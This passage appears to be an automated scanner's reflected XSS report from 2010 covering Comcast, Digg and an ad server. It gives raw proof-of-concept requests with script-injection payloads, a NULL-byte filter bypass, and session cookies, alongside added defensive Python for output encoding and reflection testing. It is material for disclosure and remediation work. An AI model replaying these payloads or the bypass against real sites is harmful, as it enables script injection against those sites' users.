Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0";alert(1)//522001d1e27/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.17. http://customer.comcast.com/Pages/FAQViewer.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQViewer.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48cbb'-alert(1)-'e073ca99f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/FAQViewer.aspx?48cbb'-alert(1)-'e073ca99f6=1 HTTP/1.1
Host: customer.comcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":3,"lc":{"d0":{"v":3,"s":true}},"sd":0}; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; __utmz=24577576.1292781826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ServerID=1035; fsr.a=1292781826322; mbox=PC#1292775334802-298696.20#1293991427|session#1292780810234-197287#1292783687|check#true#1292781887; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783625663%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ahelp%2520index%253A%2520help%2520main%7C1292783625725%3B; bn_u=6923335571706691164; __utma=24577576.1986915861.1292781826.1292781826.1292781826.1; __utmc=24577576; __utmb=24577576.1.10.1292781826; ASP.NET_SessionId=l2vema45zv4phtzqkshvqf55;

Response

HTTP/1.1 200 OK
Set-Cookie: SLBCCC=R625934426; path=/
Connection: close
Date: Sun, 19 Dec 2010 18:08:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 31588


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
indow).load(function() {
$("#shell a").click(function() {
var overlayUrl = '';
overlayUrl = 'http://customer.comcast.com/Pages/FAQViewer.aspx?48cbb'-alert(1)-'e073ca99f6=1'
//baynote_track_popup3(this.href, window.location.href, '');
BaynoteAPI.call("custom", 'baynote_track_popup3', [this.href, window.location.href, ''], 'wind
...[SNIP]...

2.18. http://customer.comcast.com/Pages/Help.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/Help.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfda2'-alert(1)-'14bdd683d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/Help.aspx?cfda2'-alert(1)-'14bdd683d0a=1 HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1035; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; bn_u=6923335571706691164; mbox=PC#1292775334802-298696.20#1293991405|session#1292780810234-197287#1292783665|check#true#1292781865; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783608847%3B%20gpv_07%3Dcomcast%2520-%2520home%7C1292783608973%3B; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":2,"lc":{"d0":{"v":2,"s":true}},"sd":0}; fsr.a=1292781820476

Response

HTTP/1.0 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:06:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=r11dc3yqy5eqr145p1pu2q55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 72338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Hea
...[SNIP]...
$(window).load(function() {
$("#shell a").click(function() {
var overlayUrl = '';
overlayUrl = 'http://customer.comcast.com/Pages/Help.aspx?cfda2'-alert(1)-'14bdd683d0a=1'
//baynote_track_popup3(this.href, window.location.href, '');
BaynoteAPI.call("custom", 'baynote_track_popup3', [this.href, window.location.href, ''], 'wind
...[SNIP]...
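The response above copies the whole query string into a single-quoted JavaScript string; the items that follow copy path segments into a double-quoted attribute (2.19) and into text between tags (2.20 onward). The Python below is an added illustration, not Comcast or Digg code, of the context-specific encoding each of those sinks needs, using the payloads from items 2.18, 2.19 and 2.20 as input. The render_overlay_script helper and the BASE_URL constant are assumptions that rebuild the overlayUrl assignment shown in the response snippet.

```python
import html
import json

# Payloads copied from the report's own findings (items 2.18, 2.19, 2.20).
# The rendering helpers below are an added illustration, not page code.
JS_STRING_PAYLOAD = "cfda2'-alert(1)-'14bdd683d0a"
ATTR_PAYLOAD = '9f91c"><script>alert(1)</script>a60ae5d7848'
TEXT_PAYLOAD = "74265<script>alert(1)</script>30d63b2ac0f"

# Assumed base URL, taken from the request line of item 2.18.
BASE_URL = "http://customer.comcast.com/Pages/Help.aspx"


def js_string_literal(value: str) -> str:
    """Serialize value as a JavaScript string literal that is safe inside a
    <script> block. json.dumps escapes double quotes, backslashes and control
    characters; we additionally \\u-escape ' < > & / so the literal can
    neither close a single-quoted string nor terminate the script element."""
    literal = json.dumps(value, ensure_ascii=True)
    for ch in "'<>&/":
        literal = literal.replace(ch, "\\u%04x" % ord(ch))
    return literal


def html_text(value: str) -> str:
    """Encode for the 'plain text between tags' context (items 2.20-2.37)."""
    return html.escape(value, quote=False)


def html_attr(value: str) -> str:
    """Encode for a double-quoted attribute value (item 2.19) and quote it."""
    return '"' + html.escape(value, quote=True) + '"'


def render_overlay_script(query: str, hardened: bool) -> str:
    """Rebuild the `overlayUrl = '...'` assignment from item 2.18.
    hardened=False reproduces the vulnerable string concatenation;
    hardened=True emits the value as an escaped JS string literal."""
    url = BASE_URL + "?" + query
    if not hardened:
        return "overlayUrl = '" + url + "'"
    return "overlayUrl = " + js_string_literal(url)


def decoded_overlay_url(rendered: str) -> str:
    """Parse the hardened assignment back to the value the browser would
    assign; valid only for the JSON-compatible literal js_string_literal emits."""
    literal = rendered.split("=", 1)[1].strip()
    return json.loads(literal)


if __name__ == "__main__":
    print(render_overlay_script(JS_STRING_PAYLOAD + "=1", hardened=False))
    print(render_overlay_script(JS_STRING_PAYLOAD + "=1", hardened=True))
    print(html_attr(ATTR_PAYLOAD))
    print(html_text(TEXT_PAYLOAD))
```

The vulnerable rendering reproduces the response line byte for byte (four single quotes, the middle two supplied by the attacker); the hardened rendering contains no quote the attacker can reach, yet decodes to the identical URL, so the page still works for legitimate input.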

2.19. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f91c"><script>alert(1)</script>a60ae5d7848 was submitted in the REST URL parameter 1. This input was echoed as 9f91c"><script>alert(1)</script>a60ae5d7848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) written in native code, where strings are terminated by a NULL byte: the filter stops inspecting at the first %00, while the application behind it uses length-delimited strings and processes everything after it. Fix the actual vulnerability within the application code by encoding the value on output, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass; the WAF is a mitigating layer, not the control.

Request

GET /submit%009f91c"><script>alert(1)</script>a60ae5d7848 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Tue, 18-Jan-2011 18:07:41 GMT; path=/; domain=digg.com
Set-Cookie: d=beddb1ae9717929527d110b095bdff05a72259ae7bf2bb201bd4dcf834b3181d; expires=Sat, 19-Dec-2020 04:15:21 GMT; path=/; domain=.digg.com
X-Digg-Time: D=245514 10.2.129.76
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15305

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%009f91c"><script>alert(1)</script>a60ae5d7848.rss">
...[SNIP]...
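The remediation note above attributes the bypass to a filter written in native code. The Python below is an added model of that failure, constructed for this report and not Digg's or any WAF vendor's code: a filter that copies the percent-decoded path into a NUL-terminated buffer stops inspecting at %00, while the application's length-delimited string keeps the markup after it. The blocklist tokens are an assumption; the real filter rules are not in the report. The hardened gate rejects any decoded NUL before pattern matching, which is the only safe handling of a byte that can never be part of a legitimate path.

```python
from urllib.parse import unquote_to_bytes

# Request line from item 2.19, as bytes on the wire (copied from the report).
REPORT_PATH = b'/submit%009f91c"><script>alert(1)</script>a60ae5d7848'

# Assumed blocklist for a hypothetical filter; the real rules are not in the report.
BLOCKED_TOKENS = (b"<script", b"javascript:", b"onerror=")


def native_style_filter_hits(raw_path: bytes) -> bool:
    """Model of a filter written in C: the percent-decoded path is copied into
    a NUL-terminated char buffer, so strstr()-style matching never sees
    anything after the first 0x00 byte."""
    decoded = unquote_to_bytes(raw_path)
    visible_to_c = decoded.split(b"\x00", 1)[0]
    return any(tok in visible_to_c.lower() for tok in BLOCKED_TOKENS)


def length_aware_filter_hits(raw_path: bytes) -> bool:
    """The same blocklist applied to the full, length-delimited buffer."""
    decoded = unquote_to_bytes(raw_path)
    return any(tok in decoded.lower() for tok in BLOCKED_TOKENS)


def application_view(raw_path: bytes) -> str:
    """What a PHP, Java or .NET application sees: its strings carry an
    explicit length, so the NUL is an ordinary character and the markup
    after it survives to be echoed into the page."""
    return unquote_to_bytes(raw_path).decode("utf-8", errors="replace")


def hardened_gate(raw_path: bytes):
    """Reject a NUL anywhere in the decoded path before any pattern matching,
    then apply the blocklist to the whole buffer. Returns (allowed, reason)."""
    decoded = unquote_to_bytes(raw_path)
    if b"\x00" in decoded:
        return False, "reject: NUL byte in decoded path"
    if length_aware_filter_hits(raw_path):
        return False, "reject: blocklisted token"
    return True, "ok"


if __name__ == "__main__":
    print("native-style filter blocks report path:", native_style_filter_hits(REPORT_PATH))
    print("application echoes:", application_view(REPORT_PATH).replace("\x00", "\\x00"))
    print("hardened gate:", hardened_gate(REPORT_PATH))
```

Note that the same request without %00 is caught by the native-style filter, which is why the scanner reports the NUL byte as the bypass rather than the markup itself.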

2.20. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74265<script>alert(1)</script>30d63b2ac0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCcLxLrNlVmBMqgN2n2hJsQDKd2qK8vl9VgYB8h7wmSgGSMVjP!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...
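Items 2.20 through 2.37 are one defect probed once per path segment: the "Page Flow Error - Action Not Found" page echoes the requested action path raw inside a table cell, so any segment the attacker controls lands in the HTML unencoded. The Python below is an added example, not Comcast code, that reproduces how those requests are built (numbering path segments as REST URL parameters and appending a marked probe to one of them) and classifies the echo in a response as unmodified, HTML-encoded or absent. The two stub functions are constructed stand-ins for the server, one imitating the observed behaviour and one encoding on output, so the scan runs offline.

```python
import html
import secrets

# Path shared by items 2.20-2.26 and the echoed <td> from item 2.20 (copied from the report).
GETFAQ_PATH = "/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do"
REPORT_PAYLOAD_3 = "74265<script>alert(1)</script>30d63b2ac0f"
REPORT_ECHO_3 = ("<td>com74265<script>alert(1)</script>30d63b2ac0f"
                 "/comcast/online/dvp/presentation/pageflows/Help/getFAQ</td>")


def rest_segments(path: str) -> list:
    """Split a path into the REST URL parameters the report numbers from 1."""
    return [seg for seg in path.split("/") if seg]


def mutate_segment(path: str, n: int, payload: str) -> str:
    """Append payload to REST URL parameter n, as the report's requests do."""
    segs = rest_segments(path)
    if not 1 <= n <= len(segs):
        raise IndexError("no REST URL parameter %d in %s" % (n, path))
    segs[n - 1] += payload
    return "/" + "/".join(segs)


def make_probe(core: str = "<script>alert(1)</script>") -> str:
    """Random hex prefix and suffix around the marker, so the echo is
    unambiguous and cannot collide with legitimate page content."""
    return secrets.token_hex(3)[:5] + core + secrets.token_hex(6)[:11]


def classify_reflection(body: str, payload: str) -> str:
    """'unmodified': raw echo, exploitable in a text context.
    'html-encoded': < > & escaped, not exploitable there. 'absent': no echo."""
    if payload in body:
        return "unmodified"
    if html.escape(payload, quote=False) in body or html.escape(payload) in body:
        return "html-encoded"
    return "absent"


def scan_segments(path: str, fetch, indices) -> dict:
    """fetch(mutated_path) returns a response body; the caller supplies it so
    the scan can run offline. Returns {parameter_number: classification}."""
    results = {}
    for n in indices:
        probe = make_probe()
        results[n] = classify_reflection(fetch(mutate_segment(path, n, probe)), probe)
    return results


def pageflow_error_stub(mutated_path: str) -> str:
    """Constructed stand-in for the observed server behaviour: echoes everything
    after /Comcast/DVPPortal/, minus the .do suffix, raw inside a <td>."""
    action = mutated_path.split("/Comcast/DVPPortal/", 1)[1]
    if action.endswith(".do"):
        action = action[:-3]
    return "<html><body><table><tr><td>" + action + "</td></tr></table></body></html>"


def hardened_pageflow_stub(mutated_path: str) -> str:
    """Same page with the one-line fix: encode the action path on output."""
    action = mutated_path.split("/Comcast/DVPPortal/", 1)[1]
    if action.endswith(".do"):
        action = action[:-3]
    return ("<html><body><table><tr><td>" + html.escape(action, quote=False)
            + "</td></tr></table></body></html>")


if __name__ == "__main__":
    print(mutate_segment(GETFAQ_PATH, 3, REPORT_PAYLOAD_3))
    print(scan_segments(GETFAQ_PATH, pageflow_error_stub, range(3, 10)))
    print(scan_segments(GETFAQ_PATH, hardened_pageflow_stub, range(3, 10)))
```

Against the stand-in that mirrors the report, parameters 3 through 9 all come back "unmodified", matching items 2.20 to 2.26; against the encoding stub every one is "html-encoded", which is the result a retest should produce after the fix.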

2.21. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f1d1<script>alert(1)</script>eea8c678143 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCL7vPL4Y0Q2pTLnvGmxRjg11vxtdMvr1JvTp0HmyHNbn5FQ6q!935594247!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.22. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6eaeb<script>alert(1)</script>d4a64e7fde7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:23 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLDXpQPVwR0NSFbDWJ48rhgPGqGFcZCPXzCVpRzn7DWwy19jLq5!-1576092857!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.23. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d3d0f<script>alert(1)</script>807ced074d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGtRfdWXBmhXRScpp4v9MJpBSnJt2lgG2ry2Pcj77vLRrJhJZp!1431461321!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.24. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 77b14<script>alert(1)</script>9cd91501f2a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGpRLHMMNQnH4fkKVJRZPpr4818zS3V3RwkRkQ1X1rCyfHxGh0!198205627!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ</td>
...[SNIP]...

2.25. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 7b6f5<script>alert(1)</script>4d76aec21db was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:25 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLFJlJV2hcp0DJXC712TSBplDsQLn2NL246M6XtmYTgJTxj0T1C!377427874!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ</td>
...[SNIP]...

2.26. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 62a76<script>alert(1)</script>a79a11159c2 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

